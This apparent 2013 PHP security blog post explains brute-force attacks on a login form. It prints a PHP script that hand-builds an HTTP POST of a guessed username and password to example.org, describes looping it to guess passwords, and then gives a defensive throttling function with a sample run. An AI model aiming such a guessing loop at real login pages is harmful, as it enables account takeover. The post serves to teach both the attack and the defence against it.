A First Look at Brute-Force Attacks on PHP Scripts

Consider the following HTML form:

CODE:

<form action="http://example.org/login.php" method="POST">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<p><input type="submit" /></p>
</form>

 

An attacker can inspect this form and write a script that POSTs valid data to http://example.org/login.php:

<?php

  $username = 'victim';
  $password = 'guess';

  // Form body, as the browser would send it for the form above
  $content = "username=$username&password=$password";
  $content_length = strlen($content);

  $http_request = '';
  $http_response = '';

  // Build the raw HTTP request by hand
  $http_request .= "POST /login.php HTTP/1.1\r\n";
  $http_request .= "Host: example.org\r\n";
  $http_request .= "Content-Type: application/x-www-form-urlencoded\r\n";
  $http_request .= "Content-Length: $content_length\r\n";
  $http_request .= "Connection: close\r\n";
  $http_request .= "\r\n";
  $http_request .= $content;

  if ($handle = fsockopen('example.org', 80))
  {
    fputs($handle, $http_request);

    // Read the whole response into $http_response
    while (!feof($handle))
    {
      $http_response .= fgets($handle, 1024);
    }

    fclose($handle);

    /* Check Response */
  }
  else
  {
    /* Error */
  }

?>

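Using this script, an attacker can simply add a loop that keeps trying different passwords and checks the $http_response variable after each attempt. As soon as $http_response changes, the attacker can assume the correct password has been guessed.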
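On the defending side, login.php can remove the signal that loop relies on by throttling attempts per username. The sketch below is an added example, not code from the original post; the function name, the constants and the in-memory $failures store are hypothetical stand-ins for whatever the application uses.

```php
<?php
// Added example: per-username throttle for login.php (all names are hypothetical).
// Constructed sample account; a real application would load the hash from its user store.
$users = ['victim' => password_hash('correct horse', PASSWORD_DEFAULT)];
$dummyHash = password_hash('placeholder', PASSWORD_DEFAULT); // verified for unknown users too

const FREE_ATTEMPTS = 3;   // failures allowed before any delay applies
const BASE_DELAY = 15;     // seconds; doubles with each further failure
const MAX_DELAY = 900;     // upper bound on the delay, in seconds

// $failures maps username => ['count' => int, 'last' => unix time]; stands in for a DB table.
function attempt_login(array &$failures, array $users, string $dummyHash,
                       string $username, string $password, int $now): string
{
    $f = $failures[$username] ?? ['count' => 0, 'last' => 0];
    $over = $f['count'] - FREE_ATTEMPTS;
    $delay = $over < 0 ? 0 : min(BASE_DELAY * (2 ** min($over, 10)), MAX_DELAY);

    if ($now - $f['last'] < $delay) {
        // Throttled: the password is never evaluated, so a correct guess sent
        // inside the window gets the same response as a wrong one.
        return 'Login failed';
    }

    $hash = $users[$username] ?? $dummyHash;
    $ok = password_verify($password, $hash) && isset($users[$username]);
    if ($ok) {
        unset($failures[$username]);   // success clears the failure record
        return 'Welcome';
    }
    $failures[$username] = ['count' => $f['count'] + 1, 'last' => $now];
    return 'Login failed';
}

// Constructed run: six guesses one second apart, the sixth being the right password.
$failures = [];
$guesses = ['guess', '123456', 'password', 'letmein', 'qwerty', 'correct horse'];
foreach ($guesses as $i => $g) {
    echo $i + 1, ': ', attempt_login($failures, $users, $dummyHash, 'victim', $g, 1000 + $i), "\n";
}
// The legitimate user logging in an hour later, after the delay window has passed:
echo attempt_login($failures, $users, $dummyHash, 'victim', 'correct horse', 1000 + 3600), "\n";
```

In the constructed run the correct password arrives as the sixth rapid guess and is answered exactly like the wrong ones, so $http_response never changes for the looping client, while the later login succeeds. Because the throttle is keyed on the username, failed guesses also delay the real account owner, which is why the delay is capped at MAX_DELAY.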

 

 

posted @ 2013-09-01 00:47  群叔